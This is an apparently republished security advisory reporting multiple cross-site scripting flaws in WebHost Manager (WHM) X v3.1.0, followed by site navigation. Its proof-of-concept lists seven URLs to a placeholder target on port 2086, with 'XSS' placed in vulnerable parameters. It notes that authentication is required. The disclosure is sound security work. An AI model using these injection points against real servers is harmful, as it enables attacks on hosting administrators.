WebHost Manager (WHM) Multiple Cross-Site Scripting

Advisory Content :

#Aria-Security Team Advisory
#<www.Aria-security.Com For English >
#<www.Aria-Security.net For Persian >
#Original Advisory:
#http://www.aria-security.com/forum/showthread.php?t=44
#-----------------------------------------------------------
#Software: WebHost Manager (WHM)
#Tested WHM X v3.1.0 (demo.cpanel.net)
#Poc:
#
http://target:2086/scripts2/dochangeemail?user=demo&domain=demo.com&emai
l=XSS
http://target:2086/cgi/addon_configsupport.cgi?cgiaction=save&supportadd
y=Domain.name&emailpipecmd=Domain.name&displaybrowserbody=1&displaybrows
ersubject=1&displaydomainbody=1&displaydomainsubject=1&displayhostnamebo
dy=1&displayhostnamesubject=1&displayipbody=1&displayipsubject=1&display
userbody=1&displayusersubject=1&type=redirect&supporturl=XSS
http://target:2086/scripts/editpkg?pkg=XSS
http://target2086/scripts2/domts2?domain=XSS
http://target:2086/scripts/editzone?domain=XSS
http://target:2086/scripts2/dofeaturemanager?action=addfeature&feature=X
SS
http://target:2086/scripts/park?domain=demo.com&ndomain=XSS
#
#P.S : Attacker must be authenticated
#
#Contact: Advisory (at) aria-security (dot) net [email concealed]

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason

WebHost Manager (WHM) Multiple Cross-Site Scripting